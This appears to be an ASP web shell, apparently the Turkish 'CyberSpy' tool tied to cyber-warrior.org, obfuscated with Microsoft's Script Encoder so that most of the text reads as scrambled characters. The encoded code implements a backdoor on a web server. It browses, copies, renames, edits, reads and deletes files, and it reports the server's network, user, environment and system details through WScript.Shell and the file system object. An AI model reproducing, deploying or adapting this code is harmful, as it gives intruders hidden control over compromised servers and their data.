odEPUky'EB@*@!8@*�@!z8@*@!zsKUY@*k�Vh~Km:m:@!4.@*@!4.@*_nN0l~@!4@*E~LP#+Mrhl.m:YDPL~J@!z8@*@!4.@*nWwHCVmxl	~FVm/�M)~J~',Zz4.mD.rKD{)VDkWfb"bx@#@&di2x9Pbo@#@&d7@#@&d7@#@&dZmd+,J|^CdWM?bVE@#@&7iZCV^~AKV;hUjAcb@#@&7d"nkwG	/RMkDnPUl8kDACd^k3,'P~W/UC8kDb^lU@#@&7i.nDbKlMlhnDD+~x,Inw^C1+c:Db:`"+$;+kY p!+.zUYDbUovJwmO4J*#BJkJSE'Jb@#@&7d@#@&77iks~Pm4s+,@!@*PPbY^+P:tU@#@&d7d"+d2Kx/ INkMn^Y,J4YOwl&JhAhc/X(+.RqlD.rKD rMLr@#@&idi2x9Pbo@#@&d7@#@&frh,|VmdWM?k^hn@#@&?Y~|sCkW.?bs:Px~;D+COr8L^D`EUmMkwDk	LRwks+UXdO:r(%+1YJ*@#@&|^lkW.?rss+ fs+D+oG^N+.cj+.khCMlhYM+#@#@&boPsk[`tZCd~GB+#,@!@*,E2XrP:tnxl]/2W	d+c.rD+PE/H4nDU2HPX,z,ZX(+MRmD.kKD 6MoJ=]+kwW	dnRAx9@#@&IndaWU/ MkOn,J@!j/"qKK,Jz1!`bV2'rJxC\m?^DbwOEr@*/s0cWwUnDcNKm;:nUDRsW1CYbWU M+VGC9`bi@!&UZ]&n:@*J@#@&"n/aWU/R	.bY+,E@!1+xDn.@*@!0KxOPWC1+xBqrxTNrUT/B~jbyn'EE@*@!(@*�@!z4@*@!JoW	Y@*k�^+h~:l:mh@!JZ+	OnD@*@!(D@*J@#@&"+dwKU/R	.bY+~EUksk	n	PF^lk�DP=P,@!4@*PEPLP#nMknm.ls+YMn~[,J@!z8@*E@#@&koPsrNvH/Ck+~{Sy#~@!@*~rwzrP:t+	)"n/aWU/R	.bY+,EZH4+Mj2X,*,z~Zz8DRm.DbW. }DoEl"+dwKUk+ Ax9@#@&idi@#@&iZC/PE2!YJ@#@&diZl^s~AKV!:jj$c*@#@&di]+kwGUk+R	.bYnPUC(kO~lkVk0PL~AK/jl(kO)^lx@#@&diks,P.ks`"+5EndDR}E.XUY.r	o`E6^lz1d	+dbJ*#P{PrEP:tnx@#@&77i.+MrnmDlsnODP{PJ+WOv?nD7nDcHC2hlY4c"+5EdDRjD7+DjlMrl(Vn/vJj/"qn:m1zH2rbb~&xkY.In-v?nD7nDcHC2hlY4c"+5EdDRjD7+DjlMrl(Vn/vJj/"qn:m1zH2rbb~r-r#b@#@&7id-lM2lDt~x,KDrhvIn;!nkY 5EDXUYMrxT`EwmY4E*#@#@&7di?+D~64NsUr~'~/M+CY64N+^OvJ?^.bwOk	Lcsr^+UX/D+s64N+^Yr#@#@&iddUnY,HW	]nw,',r8Loj}R!+DoW^Nn.v.+.rhl.lsnDDn*@#@&ddi?OPzxCfbyrU^+D,xPtWx"n2RUE(sGV[nM/@#@&i7dU+O~;WVor^+d!,x,HG	IwRwk^n/@#@&@#@&id7]/wKU/RMrO+,J@!YC4sn,4GD9nD{JETrJP^n^Vdwm^bxL{Jr!JrP1nV^wCN9kUL{JJZEJ,@*J@#@&7diI/2WUdR	DbO+,J@!oKxY~Wmmn'ECMkC^B,/k.+{v EP/W^W.xEI+9v@*@!4D@*$;PUmMk2Yvr	P�CV��sCPnVCd�M�xNnVbP9WkzmVCMR,AE,fKdXmVCD�,�E~)	P3b~b0Ykw~FVm/�M+~|G2HlslsCx�.�PjC�^lD@!&wWUY@*@!(D@*r@#@&ddiIdwKxd+c.rD+Prm{|{{|mm{|{|{m{mm|{m{|m{|{mm|{{mm|{m{|m|{m|{r@#@&idivb0Yrs,|sCk�DNVk,fWkzCVmD�,Sr/Ons+s+snXP$C�^�XW.;.@#@&di76W.,+mmt,sbs+kqO+s!~r	PZKssbV+kT@#@&idid]+d2Kxd+c	DbYn~r@!Y.@*@!Y[@*@!WKxO,0mm+{Bm.kmVvPkk"n{B E@*@*,JPL~64N+VWdYn.vsrVdqD+hTcwlO4*P'Pr@!JY[@*@!DNP7l^ro	'v4m/nsbx+E@*@!JYN@*@!ON,\mVroUxE4C/sk	+v@*Lx4d2p[U4k2p@!WKxDP0mmxB7+.NmxCv,/k.n'EFB@*@!CP4D0xJEE,[~I5E/O U+D-nM.CDbC(Vnk`r?Z"qhP{gb\2r#~',Jgm^YbWx{2;YLwmY4'E~LP-lM2lDt~',J[6smXH+kU/r{J,[P"+asl1+csbVnd&Y+sTRalY4SE-r~ruE#~',JEJ@*FWaXCsm@!zC@*@!zWW	O@*@!WKxDP0mmxBmDrl^B~dby+{vFE@*[	8dwpPLx8/2IrP'PwGDslOH!:4n.vsrVd&Yns!c/k.+Jq!ycSPZ#~',J[	8/ai|( 'x(/ai'x8dai'x(dwp@!&WKxY@*@!JY[@*@!&DD@*r@#@&ddixaY@#@&7diIndaWxknRqDkDn~J@!zDl8Vn@*r@#@&di7@#@&d73^/+@#@&idrs,hbNc:l(V+B,Bq#,@!@*Pr�J~P4+x=]+kwW	dnRqDbYnPE/H4nDU2X,*~&,ZX8nMO	lM.bW.crMoJ=IdwKxd+c2U[@#@&di7ZH4+M	CDMkKDmbVOb09k.rx,'~]wVC^`PDbhvIn$E/Ycp!nDH?ODbxLcrwlD4J*#~rkE~r-r#~[~E'J@#@&i7d}VCzg+/Unkk~',]wsmm`KMkscI;;+kY }!+DHjYMkxTcEr^lH1n/UnkkE#*SJ-JSE'J#@#@&id7kw~sk[vK9~F+~ybP@!@*~JM�J~P4+x=]+kwW	dnRqDbYnPE/H4nDU2X,*~&,ZX8nMO	lM.bW.crMoJ=IdwKxd+c2U[@#@&di7?YP}8%sUr,'~Z.nmYnr(%+1YcEUmDr2DkUocobVnUXkY+sr(%+1YE#@#@&77i?+D~HHsk^n~',r(Lo?6 V+Osbs+vrsCH1+dU/r#@#@&id7tXwkVR;GwHPcZH4n.qlDMrWM{b0Or0Gk.kU#@#@&id7kw~2MD H!:4n.,'~!,P4+U@#@&iddiIdwKxd+c.rD+Pr@!0KxY,WCm'El.kCsEPdk.n'E v@*@!m+UOD@*@!(.@*@!8M@*nlX	l0lP@!4@*J,[~6^lXgn/	+/b~'Pr@!J4@*@!8.@*|GwHCVmxCU,C+[n6)~@!(@*rP',ZH4+Mm.DbW.{z3Or6fk.rx@#@&di77kwPsk[`PC(Vn~OSF*P@!@*,J�J~P4+U)"nkwG	/RMkDnPrZz4Dj2HP*,&P;X4.RmDMkGD 6MoE)"n/aWUdR2U[@#@&7di3	N~bs@#@&did@#@&di2UN,ko@#@&dd@#@&d@#@&d;Cd+,J9+sJ@#@&id/l^sP~Ws;s?j$c*@#@&di]/2Kxk+RqDbO+,?C4bY$CkVk0~[,AWkjC4bYzVCx@#@&id#+MrnmDChYDn~{P]+asmmnvKMk:vI5E/OR5En.H?YMrxT`JaCOtr#*~EuESr-E#@#@&di?nO,r4%oUr~',/M+CD+}4LmDcJUm.kaYrUTRsbs+UX/Dnhr(LmOJb@#@&d7?OPtXor^+Px~}4%sU6cMnDsbV+v..khl.ls+O.#@#@&7dtXsbsnRG+^+O+@#@&idrs,3DMRH;s4+.~{PTP:4x@#@&didI/aGxk+ MkOn,J@!U/I&nK,J)1VjzM3'EExl-lU^DbwOEr@*/ns6RGwUD 9W1E:xD VKmCYbWU M+VKCNv#i@!&jZ"qhK@*J@#@&id7IdwKxdncDrOPE@!6G	Y~6l1+'ElMrl^B~/bynxE B@*@!mxY.@*@!(D@*@!8D@*jbVrxUPGWdzm)P~@!(@*EPL~j+.bnmDls+D.+,[~J@!z8@*@!4D@*E@#@&ddAU[Pbs@#@&7@#@&7@#@&7Zmd+,J.n	J@#@&7bs~Km8^+~@!@*,KkDV~K4+U)"+d2Kx/ MkY~E�laDmy~|GUDDGVe~ZH4n.UwX~X,z~|K[,5nD3b/k.m~f�k�OkMksrHWDc Rr)Id2W	/R3x[@#@&d7ZmsV,AGs!:?i$v#@#@&i7"+daW	/+cMrYPjl(kO$m/VbVPLPAKdjl(kDbslU@#@&d7kw~KMkhc"+;;nkY p!nMXjDDbxovJkOlDEdJ*#~@!@*PJyEP:t+	@#@&didj+.kKCMlh+D.+,'~]wVC^`PDbhvIn$E/Ycp!nDH?ODbxLcrwlD4J*#~rkE~r-r#@#@&77irslHH+kxndbP'~6(LnMKdD+.v.DkhlMC:Y.+*@#@&7idIdwKx/ 	DbYPE@!8.@*Hn\1;YiP)[=P@!WG	Y~0m^'ErMWDTkmEJ,/ry'EEyJJ@*@!4@*JPL~6VmXg+dxndbP'Pr@!z(@*@!8M@*J~',{@#@&i~,PE@!0KD:,l1OkKxxJrJ~',I+$;+kYRUn.\Djl.kC8^+d`rjZ"qKP|1b\3r#~[,ErJ~s+DtW9'rEoYEJ@*J~',{@#@&7P,PJ@!rUw!Y,YzwnxrJ4k9[+	JE~	l:nxrJCmDrKxErP7lV!+{EJM+UJr@*E~LP{@#@&d,PPr@!rxaEDPOX2n{JEtb[NxEE,xlhn{JE/DCDEdrJ,\l^ExJr EJ@*J~',{@#@&7P,PJ@!rUw!Y,YzwnxrJ4k9[+	JE~	l:nxrJ2lD4rJ~7l^E+{JrEPLPPDb:c];EdYcpE.z?DDbxL`E2mY4J*bPLPEEr@*J~',{@#@&i~,PEI+	kPGWkzl,b[�),@!rUaEY,OXa+'rEO+XYrJ~xCh'EJ	nh	lhnrJ@*E~LPm@#@&7,P~r[	4/aiLU4kwI@!bx2;DPYH2+{JJk;8:bYrJ~\Cs!+xJr9+�b�Yr.rJ@*E~LPm@#@&7,P~r@!J0WM:@*E@#@&d72^/n@#@&ddi#+Mknm.C:YM+~'~]wsl1n`:DrhvI+5;/OR5;DzUYMkxT`r2lDtE#*~Ekr~J'E#@#@&di7j+DP}4%sj6,'~ZMnlD+68N+mOcr?^Db2DkUTRwkV?HdY:64N+^Or#@#@&7di?+D~\Xwk^+~'~6(Lo?} MYor^+`#nMkKlMCs+OM+*@#@&idi/X(+.mD.rKD{zVYb0fb"rx,',Sn0Ocj+.khCDm:nOM+~(UUY.I-v.nMkhlDm:OD~E-r#b~LPKMr:vI+$;n/DR5EnDzjDDrxTcJ	+AUm:+Eb*@#@&di7tXobVRHK\~`;X8+MC.MkWMmb0Yk69rybx*@#@&d77bs~Km8VP@!@*,KkOsPPtU=InkwKx/Rq.kD+~Jnl.��sm�Y�DsCV�,|W	O.W^",5nYVrkk"PA.k�b:  cJ)]nkwGxknc2U9@#@&ddikw~2MD 1!:8nMP',TP:t+	@#@&didiIn/2G	/nRq.kD+~E@!0WUO,0CmxEl.bl^BPkk.n'E v@*@!mnUD+D@*@!4M@*@!(.@*2k3bP9WdzmP)N�=~@!(@*E~LP.n.bnCDmhY.PLPJ@!z(@*@!(D@*f�k�OrMkVUPGW/HC@!4@*),J~[~/H4nDqCDMkG.|b3Or6frybU@#@&7idiI+kwKU/R	DbYn~r@!?;]qhKPd)HM`bV2xJEBm\C?1.kaYEE@*/+sWcW2+	nMR[Km!:+	YcsW1lOkKx .VWm[`*i@!Jj/I&n:@*E@#@&7id3x9~kwd@#@&id2U[,ko@#@&7iko,IbotD`t/lk+SF*P@!@*,Jwr~K4+x=]n/aW	/nR	.bYnPr/X(+.jaXPX~JPFW9~I+O0kkky1+,9+�b�YrDbVrzKDRc J=I+k2Gxk+c2UN@#@&iZC/~JD.GMJ@#@&7iIn/aG	/ncMkYPr@!mxO+M@*@!WKxY,Wl1+'EC.kmVEPdk"n{B+B,^W^W.xED+[v@*P@!4@*FKN~_lDl/�@!z6GxD@*@!z1+UOD@*r@#@&i@#@&i/C/Pr5CD[rsJ@#@&i7ZmVs~~WV;hUj$`*@#@&d7bs,Kl(V~@!@*PPkDVn~:t+	lI/wKUd+cMkO+~E,JlIdwKxdnc2x[@#@&d7IdaWUk+cDbY~J@!0GxDPWC1+'E	k	oNbUL/EPkk"+xvFB@*[@!8D@*@!&oKxY@*@!wWUY,jbyn{JrcJr@*@!8@*Il.N�sPFG	EVm.�@!J4@*@!&oW	Y@*@!8D@*@!(D@*@!(.@*r@#@&7iks~]bo4Yv\;ld~8#P@!@*,EwrPPtxl]/wKU/RMrO+,J;X8+.jaX~*,&PnW[~I+YVrkk"m~G+�r�DkMkVbXK.RcRE)"+d2Kx/ 2	N@#@&77I/aWU/n qDrY~J@!0GUDPmGsKDxBMn9B@*@!Vb@*@!(@*U^DbwOPzN�@!&(@*@!Jsk@*@!zwGUY@*@!(D@*J@#@&id]+k2W	/n qDkOn,J9WkzmP)9�x�,fk^+9r�k	k"PTk8r,N+�b�OkM+4bsrDkk	k"~E@#@&d7IdwKxdncDrOPEfKdHl~zN�	�Pf�k�DrD9kVYx~jKxDm~|KNNm~u+MtmxLk~$bD~f�r�k0VrV,5l2hmx�"l,!Dn0PIW3DEME@#@&d7I/2G	/+c	DbY+,EP�:,SbxVVn.,B]+$;+kY jD\n.jl.km8^+dvJr?Z"qhP{gb\2rJbv,kV~fbxlsrVP~kMPulsn,MnYb.k^:r�ObDRE@#@&d7IdaWUk+cDbY~J@!4.@*@!4.@*r@#@&i7kwP:b[cK9~8vS b~@!@*~JM�EP}D~hbN`rhT~f~yb,@!@*,J(+J,rM~:bNcksoS0B #,@!@*,JlME~K4+	)]+d2Kxd+c	DbYn~rZX8nM?2X,X,z~;X(+D m.DbW.R}DLE=I+k2W	/+c3UN@#@&idrs~hbNcksL~2~+b,@!@*~E(+EP:4xl"+kwW	/ MkO+,J/z(+DU2X,*PJ~/X(+MO	l..bW.R}.or)]nkwWUdR3x9@#@&d7"+kwW	/ MkO+,J@!WKxY,^W^WD{v.+9B@*@!sk@*@!(@*6YKhlDkV~G+0C^PcK�s~UkOVDk,Cm^3^+b@!J4@*@!JVk@*@!zwWxD@*@!4M@*r@#@&d7]/2W	d+c.rD+PE@!6WUY,^KVGM'ED+9B@*9k03CYe@!&oKxY@*~KKwV!~9+6l1+~5C2mDV+	~CmxLr,|VCd�MNnP}s9E�;	E.lPGk0VlDP3Nbx  ePJr��s+sP|^Cd�D�,'rJ~A�s�h�	Nnx,ul	or~nVld�.9+~r^[!�EU!y!PM�M+(rVbDdk	k" rP@#@&7dbsPsr[`tZm/n~{Sy#~@!@*~JaXE~}DPJn6YcbMhBFb,@!@*PJ\J,6D,:rNvK[S8G~8bP@!@*Pr�E~K4+	)]+d2Kxd+c	DbYn~r|W[~I+O3bdby^PG+�k�DkMrVbXGD,z~/H4+MRmDDbG.R}DTJlIndaWU/ 2	N@#@&idIndaWU/ qDrD+,J@!(D@*~JrK�hPUkOn^+Db~Cmm3^nEJ,k�^+hVn.bP8E^;x9E�;U!yPVsm/�.P7n,lsDP0Vlk�D^nD,lsY�	NC~b�V+s~XmwlM~$E,1Nnxsn,k�s+s~5mwC^m��x�y~F^ld�D~GkV0lDP+9k	@!4M@*@!4M@*E@#@&ddboPskNv\/lk+BGS b~@!@*~JazJ,K4n	)IndaWU/ qDrD+,JZH4.?aX~*,z~/H4+MRmDDbG.R}DTJlIndaWU/ 2	N@#@&idIndaWU/ qDrD+,J@!6W	OP1WsWM'v.NB@*@!Vb@*@!(@*jkkY:~k"r	VnDb~K/O@!J4@*@!&^k@*@!JoKxO@*@!(D@*r@#@&7d"+dwKxdncDbO+,J|^Cd�D,\P)VO~nVC/�M~k.kUsDkUr,`K+Mhb/dbW	#PD+kOPYh+	k"r,/l�^CD@!4D@*@!8D@*J@#@&7dro,:rNvPNBFSy#P@!@*,J.�J,6MPhbNvk:T~2S *P@!@*,J8nrPrM~:bN`bhL~R~y#~@!@*~rl.J,Ptxl]/wGUk+ MrD+~rZH4+M?azPlP&P;X8nMOm.DbWDc6.or)"+dwGUk+ 2	[@#@&d7rwP:r[vkhoBfB b,@!@*PJ(+r~K4+U)"+d2Kx/ MkY~EZH4Djwz~lP&P;z4DR	mDDrGMR6DTE=InkwKx/RAUNid@#@&id]nkwW	d+cDbOnPr@!6WUY~^KVGD{vDNv@*@!Vk@*@!(@*)DmhmPoKx0/kHW	;@!J4@*@!JVr@*@!zsKUY@*@!4M@*E@#@&diIn/2G	/nRq.kD+~E~+Vr.^k~SKVm/zKxENl,fKdXmPiymxO�d�	lPICNmPfKdzl,l9�Pr�kU[PL+�UP4+.4mxor~(k.PDnMkhPT�D+,lMC:mPzla:CU�.�P/m�slMJ@#@&77kwPsk[`rhT~f~ybP@!@*~E(+J~6MPhk9ctZCk+BG~y#,@!@*,J2XrPP4x)"n/aWxkn MkD+~J/z(+.?azPlP&~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&dd"n/aWxkn MkD+~J@!8M@*9+6CE^Y~JK3ldzKx~r,C	P$!V!xN!�E	;y,|slk�D[�.BJ@#@&7dbsPsr[`b:T~0~+b,@!@*PrCDrPP4x)]nkwGxknc.bYPJ;X(nDUwzPlP&~nWN,e+D3kkr"mPG+�r�Yr.bVrXK.J=IndaWxdnc2UN@#@&id]/aWxk+cADbYnPrA;s!xN!�;x!yP9r"k	N3rPznMkUk.rP9+�r�ObD:n[x~Am�VmP9bk.xVD,)VD�x[l,b.CslPICwm4k^r./bxbyE@#@&7iIn/aGxk+ 	MkYn~rHnYbU,|;DEkEB	l,ok.kV/V~F^l/�M~5KVE	;~\PnVC/�.~zN�U�PICyslU�",5+OnMVrNb.cJ@#@&diks,:b[`b:L~R~+b,@!@*,ElMJP:4nx=I/2WUdR	DbO+,J/z(+Dj2HPXPJ~nW[,5Y3b/b"mP9+�b�Yr.bVkHGDr)Id2W	/R3x[@#@&d7IdwKxdncDrOPE@!(.@*@!WKxDPmKVK.'rJ:sw!TTZJJ@*9WkXl,i"l	Y�k�xCP!�.P)Dmhl,)@!&wWxO@*r@#@&di]/2Kxk+RqDbO+,Jr3bx^r,H+Drx,|ED;dEExmP9WdzmPiymUY�k�x�~emy�xE@#@&d7IdaWUk+cDbY~JG+Wl!VO~}VlMC3,R:98~4VbDs+Uhb�YrDB~:94~r(lDndbxrP9n�b�YrMkaPkkY[k�bxry,NGdHlP!"l	Y�/�	C~o�M+,l.lhC,XCwm8k^k.rkxk"E@#@&7dbo,:r9`tZlk+B{~y#~@!@*PE2HJP:4+	)Id2W	/R	DrOPE|K[PI+OVb/k"^P9+�b�ObDr^kHWD,z,/X(+.Oql..bWDc6DTJ)"ndwKxk+ 2U[@#@&7d"n/aWUdR.rD+~J@!8M@*@!6W	YP1W^GD{JEawsTTZ!Jr@*fK/Xm~)N�,k�bx[+~)Mlhl,l@!JsGUD@*J@#@&id]+k2KxdRqDkD+,Ek0kUmbP\nDkx,FEDE/!U[l0k,JE:[8rJ~k(CD/rUbP/rsbxE@#@&7iko,:bN`b:TS%B bP@!@*~EmDJ,Ptx)"ndwKxk+ .rD+~J;z4Dj2HP*~&,|GN,eYVb/bymPGn�k�Dk.k^kzGMJ)"n/aWxkn 2	N@#@&7d]nkwGxknRqDrOPJ).m:C3,rkYn9k�bxk.P9G/Hl~l9�Pr�r	N+,L+�m+	~r/D+9k�rxr",YnDbhk,XC"�	PJ@#@&idrs,hbNctZm/+BGB+#,@!@*PrwzE,rD,J+6Y`z.h~8#,@!@*PEtrP6D,hk9`P[BFGSq*P@!@*,E�rPP4+	)I/aGxk+ MkOn,J|K[PI+Y0rdk.mP9+�r�ObDrVbzWMP&~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&dd"n/aWxkn MkD+~J-n,JEb9�~k�bx[nrJPjn�xn�k	r,k�CM+DV+Hka~bMl~A!YGU!xl,P�3^lX�	E@#@&id"+dwGUk+ MrYPE@!(D@*@!8M@*@!4M@*@!4.@*@!(D@*r@#@&7dbs~Km4sn,@!@*,PkDV+,P4+	)"+dwGUk+ MrYPE�CaDl"~nWUYMG^"~;X(+DUwH~*,z~|KN~eY3bdk.m+,9n�k�DkMkskzGMR RrlI/2G	/+ 3	N@#@&i7bs~:l(V+,@!@*~KbYs+,K4n	@#@&i7I/wKUd+cINrDn^DPEtDOw=z&AShR/z(+.OqCMDrKDcrDTJ@#@&di2UN,ko@#@&dZmd+,Jk	WGJ@#@&id/lss,AGV!h?`Acb@#@&d7]/2W	dR	MkD+PUl(rY~ldVb3~',AWkjl(kYzsCx@#@&idj+O~q/41OhKDV~{P?n.7+.R;.lOr(L+1YvEUm.kaY HYhK.3r#@#@&77kwPsk[`P[BF~ybP@!@*~EM�JPP4xlIdaWUk+cDbY~J;X8+M?2z,*PJ~ZH4+MR	lMDbW.R6.TJlIdwKxdnc2x[@#@&d7?O,d4?4+V^P{~?D-+MR/.lY64N+mDcEUmMk2Y j4+sVrb@#@&d7jYP	d42U\,x,d4?4+V^RAU\bDGxs+UOvJ?IjKAHJ*@#@&diI/2WUdR	DbO+,J@!8M@*@!WG	Y~0m^'CMkmVPkk.n'y@*E@#@&d7rwPKm8VP@!@*~PkDVPPtnU=In/aGxk+ 	MkYn~rPE)"nkwG	/R2	N@#@&dikoPsk[c:kY^n~O~F*~@!@*,J�rPPtnU=In/aGxk+ 	MkYn~rZz4.Uwz,*,zP;X(nD CDMkG.crDTE)"+/aGU/RAx[@#@&7ikoPdn0D`).s~Fb~@!@*~J\E,K4x=I+kwKU/R	DbYn~rZX(nD lM.rWMR}DLJl]/2W	d+c2U[@#@&d7rwPJ+6Ovb.s~8#P@!@*,E}rP)x9Phr9`Km8V~,BqbP@!@*,J�EPP4xlIdwKxdncDrOPEZH8DRqlMDkKDc6DTJlI/2G	/+c3x9@#@&i7vO OdkdYns:nX~Am�V�zGMEyRR OR@#@&7iInkwKx/Rq.kD+~J@!0GUDPmKsWM'B[oo!Z!ZB~?r"'v&E@*@!(@*j;	Em;~�.+sVbV^+.b@!J4@*@!zwGxD@*@!4M@*E@#@&dd"n/aWxkn MkD+~J@!8@*n4,FE^VCU�1�)P~@!J4@*J,',d41YhKD0 jk+.1m:n~LPJ@!8D@*J@#@&77kwPsk[`PC(Vn~OSF*P@!@*,J�J~P4+U)"nkwG	/RMkDnPrZz4Dj2HP*,&P;X4.RmDMkGD 6MoE)"n/aWUdR2U[@#@&7d"nkwG	/RMkDnPr@!8@*UEU;1EPz[�),@!z(@*EPLPq/41nOSW.3c/Wsw;OD1ChP'Pr@!(D@*r@#@&ddbs,Pl(VnP@!@*~PbYV~K4+x=]n/aW	/nR	.bYnPr~J=IndaWxdnc2UN@#@&id]/aWxk+c	DbYnPr@!8@*g+YSGD0Pb9l~@!J4@*J~[~	ktH+DAWM3 ik+D9Gslrx,',J@!(D@*@!4M@*r@#@&idj+DP9.b\+k~',/4HnYSWM3 2U;s1nYSGD0f.r7+/@#@&idrs,hbNc:NBFvB *~@!@*PED�rPP4x)"n/aWxkn MkD+~J/z(+.?azPlP&~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&ddwGD,kP{~TPDW,f.k-nkR/W!UY,O~q@#@&d77"+dwKUk+ qDbY+,J@!8@*GDr\P[n,I+9nPvHlanCNK#=P@!z8@*rP'PG.k7+d &Y+hcb#~[,E@!4.@*J@#@&didboP:l8VP@!@*,KkDs+,KtUlI/aWU/n qDrY~J,Jl]/wGUk+ 2	[@#@&7i16Y@#@&i7I/2W	/n qDkDnPr@!0KUOP1W^W.'v:wsT!ZTB,?r"'Bfv@*@!8@*GG	lU�sP�.+V^k0s+Mk@!z(@*@!&wWxD@*@!(D@*r@#@&diI/2WUdR	DbO+,J@!8@*��V+h^b)~@!J8@*J~LPq/tAx7cJhI6ZA?j6"{b"/C&K2;PiIAJ*P'PE@!(D@*J@#@&diko~d+0Oc:l8VSy#~@!@*,JZHJ,PtxlI/2G	/+c	DbY+,EFW9BmP\�NC4mVnP7CDcR ~;X4n. CDMrKD }DTJ)"+k2W	/nRAx[@#@&dd"n/aWxkn MkD+~J@!8@*��Vn:1rPUlz�d�,)P@!&(@*EPL~q/4Ax7`Jgjt$2"{6s|n]6;2?U6IUJ#,'~J@!4M@*E@#@&7iIn/aGxk+ 	MkYn~r@!8@*wCsksH),@!z(@*r~[,dtAx-crnI}/2U?r"m(fA1:koq3]r#~[,E@!(D@*@!(D@*E@#@&d7kw~sk[vK9~F+~ybP@!@*~JM�J~P4+x=]+kwW	dnRqDbYnPE/H4nDU2X,*~&,ZX8nMO	lM.bW.crMoJ=IdwKxd+c2U[@#@&di]+kwW	dnRqDbYnPE@!6WUY,^W^W.xEasoTZ!TB,jbyn{B2B@*@!4@*jkkYn:,�yns^k3^nDb@!z(@*@!zwW	Y@*@!8.@*J@#@&i7kwPhr9`K[S8GSF*~@!@*~r�J,Ktx=]+kwGxk+ 	MkY~J;X4.jwHPlP&PFG9Pe+DVkkk"^Pfn�r�Dk.k^rHW.r)"+/aW	d+c2UN@#@&77"+/aGxk+Rq.rYPr@!8@*rK=P@!z(@*J,[~.;EndDRd+M-D-mDbl4^+kcJdr/bd{)9GIJ*~[,J@!(.@*J@#@&id]+d2Kxd+c	DbYn~r@!4@*jb/O+s~tkhmDb)P@!z(@*J,[~kt3U7`J}jJ*P[,E@!4M@*r@#@&d7rwPPl(s+,@!@*~:kYsn,K4+	l"+daW	/+cMrYPE�laDC",|W	ODKV",/z4DUwzPX~JPFW9~5YVrkky^n,fn�k�DrMksbXKDRcRrlI/2W	/n AxN@#@&diI+k2Gxk+c.kOn,J@!4@*	+(PjnM\+.l,@!&4@*E,[~M+$E+kYcd+M\nD7l.rm4Vd`r?2"#3I|?}sP)]AJbPL~J@!4.@*r@#@&77"+dwKUk+ qDbY+,J@!8@*;Wh:mx[l,@!z(@*J,[Pqd4?4+^V 2a2mx[2	-kMWUhxYjOMkUokcr]/K:Uw+1]rbPLPE@!(D@*E@#@&di]+kwW	dnRqDbYnPE@!(@*jXkO+sPj�.�1�/�)~@!J4@*J,',d4?4+V^RAawmx[2	\r.Kx:UYUYDbUL/vJu?e?P3tf]qj3]r#~',J@!8.@*J@#@&i7"+daW	/+cMrYPE@!(@*jzkY+s~|^l/�M�l~@!J4@*J~[~	ktjtsVc2a2mxN3U7k.W	hxOUYMkxT/vE]U5jKAH]6}K]rbPLPJ@!8.@*r@#@&d7IndaWU/ MkOn,J@!8@*UtnV^~nVCk�D�=P@!J4@*EPLP	/4?4n^VR;;DM+xD9rDmDW.X~',J@!4M@*@!(D@*E@#@&d7rwPPl(sP@!@*P:kY^+,PtxlI/2G	/+c	DbY+,E�CwMl.PFWUOMWs",/X(+.jaXPX~JPFW9~I+O0kkky1+,9+�b�YrDbVrzKDRc J=I+k2Gxk+c2UN@#@&idvO RSb/On^+:n~~kOYbR OR @#@&ddbs,Pl(VnP@!@*~PbYV~K4+x=]n/aW	/nR	.bYnPr~J=IndaWxdnc2UN@#@&idjY,fDb\dP{PHWDtrUT@#@&i7?YPqd41YSW.3~x,1GY4rxT@#@&7i?+O~q/4?4n^V~{PgWY4k	L@#@&d7?Y~	kt2	-P{P1KO4k	o@#@&7P~~bs~Km8VP@!@*,KkOsPPtU=InkwKx/Rq.kD+~J�mw.C.P|KUYMWVe~/X(+M?2X~X,z~|K[PI+OVb/k"^P9+�b�ObDr^kHWDcRcE)"+dwKxdnc2x9@#@&iZlkn~J:6DfG/zCzmE@#@&7d;lss,AWs;s?iAvb@#@&7ikwP:bNvPNBF~y#~@!@*PJM�EP:t+	l]+kwKxd+ 	MkO+,EZH4n.UwX~X,z~ZH8DRqlMDkKDc6DTJlI/2G	/+c3x9@#@&i7]+kwKxd+ 	MkO+,jl(kO$m/VrV,[~AKdUl8bYzVl	PL~J@!0GxDPWC1+'rElMkl^EEPkk.+xJE+rJ@*J@#@&diBPnXYP9GkXCPV�.�	Y�s:PAm�V�HGD!y@#@&id]nkwW	d+chDbOnPrP:+aY~9K/zl,$l�^lUL��@!4D@*E@#@&7dbo,:r9`b:oB%B+#,@!@*Prl.E,KtU)"+/aGU/RqDrYn~rZz4.?aX~X,zPFG9Pe+DVb/r.mPf�k�DrDbVrXKDEl"+/aGxk+RAU[@#@&diIn/2G	/nRS.kD+~E|{{mm|{m{|m|{m|{|{{|{|m{|{m{|{mm|{{|m{|{{|mm{|{|{m{mm|{m{|m{|{mm|{{mm|{m{|m|{m|{|{{|{|m{|{m{r@#@&7iI+k2W	/+cA.kD+r@!8D@*@!(D@*J@#@&diko~:l4sn,@!@*P:rDVn,K4+x=IdwKxd+c.rD+Pr�CwMly,FGxDDKVZP/z(+.?azPlP&~nWN~eYVkkr.mn,f�k�YbDbskHW.RcREl"+/aGxk+RAU[@#@&di@#@&d7WbVnP{~IwsC1+`P.b:cI5!+dDR5E+MXUODbxL`r0rsJ#*SJ-J~rwE#@#@&idj+O~6/GP{~ZM+COr4%n1YcJU^Mk2Dk	oRwk^n?H/O+sr8%mYrbP,@#@&i7j+DPmPxPWdKR6wUK6OobV+cWbVn#@#@&id]/aWxk+c	DbYnP"+2smm+v]+aVl1nc?D7+.RuPtS3x1GN`C "+l[)^Vb~j8;DJ6~r@!4M@*rb~rPE~r[U8kwirb@#@&ddbo~Km4^+~@!@*~:kOV~K4+Ul"+/2G	/nRq.bYn,J�mwDmy,FW	Y.W^"~/H4+MjwHP*,&~|KN,5nYVrkk"m~f�k�OrMkVrzKD RcE=InkwKx/RAUN@#@&7d@#@&77"+/aGxk+RS.rYJ@!4.@*E@#@&d7IdwKxdnchDrOPE{|m|{m|{|{{|{|m{|{m{|{mm|{{|m{|{{|mm{|{|{m{mm|{m{|m{|{mm|{{mm|{m{|m|{m|{|{{|{|m{|{m{|{mm|{{|E@#@&dd"ndwKxk+ h.rD+E@!(.@*r@#@&7iI+d2Kxd+cAMkOPrPK6D~fK/zl,?GU!@!4M@*J@#@&diroPsk9`r:LSR~+#,@!@*,JC.rPK4n	